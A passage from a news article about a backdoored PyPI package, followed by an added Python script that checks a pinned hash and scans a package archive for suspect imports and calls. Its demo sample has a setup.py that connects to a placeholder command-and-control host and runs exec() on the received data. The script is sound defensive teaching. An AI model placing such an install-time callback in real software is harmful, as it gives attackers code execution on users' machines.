Malware in PyPI Code Shows Supply Chain Risks

A code backdoor in a package on the Python Package Index demonstrates the importance of verifying code brought in from code repositories.

The pace of modern software development requires code reuse, and effective code reuse requires code repositories. These collections of code fragments, functions, libraries, and modules allow developers to write applications without having to reinvent every small (or large) detail in their code. That makes repositories very valuable to developers – and very rich targets for malicious actors.


Researchers at ReversingLabs have discovered the most recent attack against a repository: a backdoored module in the Python Package Index (PyPI, also known as the Cheese Shop), the primary package repository for Python. This isn't the first time PyPI has been attacked, but this one is notable because it involves malicious code that had been reported before and was believed to have been removed.


"Essentially, a backdoor that has been reported before but hasn't been cleaned completely from the repository was still available and live on the Web page," says Robert Perica, principal engineer at ReversingLabs. And while the package involved is not ubiquitous, it is being used. "What's troubling about this package is that even though it's not a popular package, it averages 82 installs per month," Perica says.


The malware resides in a module named "libpeshnx," which closely resembles an earlier module named "libpeshna" contributed by the same author. According to ReversingLabs' blog post on the discovery, the backdoor mechanism itself is simple: the code contacts a command-and-control server and then waits to be activated.
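The article's point is that code pulled from a repository has to be verified before it is installed. The following script, added here as an illustration and not taken from the article, from ReversingLabs or from the package in question, shows two checks a practitioner can run on a source distribution before `pip install` gets to it: comparing the archive against a hash pinned earlier (what pip does with `--require-hashes`), and a static scan of every `.py` file in the archive, including `setup.py`, which runs at install time, for the ingredients a phone-home backdoor needs (network modules plus `exec`/`eval` of received data). The suspect-name lists are assumptions of this example, and the sample package it scans is constructed in memory so the script runs offline.

```python
# Added example: checks to run on a package archive before installing it.
# Illustrative code, not the article's, ReversingLabs' or the package
# author's code; the sample package below is constructed for the demo.
import ast
import hashlib
import hmac
import io
import tarfile
from dataclasses import dataclass

# Modules and builtins worth a manual look when they show up in a package,
# especially in setup.py: a backdoor that phones home needs a network
# module, and one that waits for orders usually ends in exec()/eval() of
# whatever it received. These lists are an assumption of this example.
SUSPECT_MODULES = {"socket", "urllib", "http", "requests", "subprocess"}
SUSPECT_CALLS = {"exec", "eval", "compile", "__import__"}


@dataclass
class Finding:
    path: str
    line: int
    what: str


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_hash(archive: bytes, expected_hex: str) -> bool:
    """The check pip performs with --require-hashes, done by hand:
    accept the archive only if it matches the hash pinned earlier."""
    return hmac.compare_digest(sha256_hex(archive), expected_hex.lower())


def scan_source(path: str, source: str) -> list:
    """Walk one Python file's AST and report suspect imports and calls."""
    findings = []
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError as exc:
        return [Finding(path, exc.lineno or 0, "unparseable Python")]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPECT_MODULES:
                    findings.append(Finding(path, node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in SUSPECT_MODULES:
                findings.append(Finding(path, node.lineno, f"imports from {node.module}"))
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPECT_CALLS:
                findings.append(Finding(path, node.lineno, f"calls {node.func.id}()"))
    return findings


def scan_sdist(archive: bytes) -> list:
    """Scan every .py file inside a .tar.gz source distribution (no extraction to disk)."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tf:
        for member in tf.getmembers():
            if not (member.isfile() and member.name.endswith(".py")):
                continue
            fobj = tf.extractfile(member)
            if fobj is None:
                continue
            text = fobj.read().decode("utf-8", errors="replace")
            findings.extend(scan_source(member.name, text))
    return findings


def build_sdist(files: dict) -> bytes:
    """Build a small in-memory .tar.gz so the demo runs offline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample package: the library code is harmless, but setup.py
# opens a connection at install time and executes whatever comes back.
SAMPLE_SDIST = build_sdist({
    "demo-1.0/setup.py": (
        "from setuptools import setup\n"
        "import socket\n"
        "conn = socket.create_connection(('c2.example.invalid', 4444))\n"
        "exec(conn.recv(4096))\n"
        "setup(name='demo', version='1.0')\n"
    ),
    "demo-1.0/demo/__init__.py": "def add(a, b):\n    return a + b\n",
})


def report(archive: bytes, pinned_sha256: str) -> list:
    """Hash check first, then the static scan; returns the findings."""
    if not verify_hash(archive, pinned_sha256):
        return [Finding("<archive>", 0, "sha256 does not match the pinned hash")]
    return scan_sdist(archive)


if __name__ == "__main__":
    pinned = sha256_hex(SAMPLE_SDIST)  # in practice this comes from your lock file
    for f in report(SAMPLE_SDIST, pinned):
        print(f"{f.path}:{f.line}: {f.what}")
```

The hash check only proves the archive is the one you reviewed earlier; it says nothing about whether that archive was clean, which is why the scan runs on the first download as well. The scan is deliberately noisy (plenty of legitimate packages import `subprocess`), so treat its output as a list of places to read, not a verdict, and pay most attention to anything flagged in `setup.py`, since that code runs with your privileges at install time whether or not you ever import the package.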


A Supply Chain Attack

Recent years have seen an incre ..
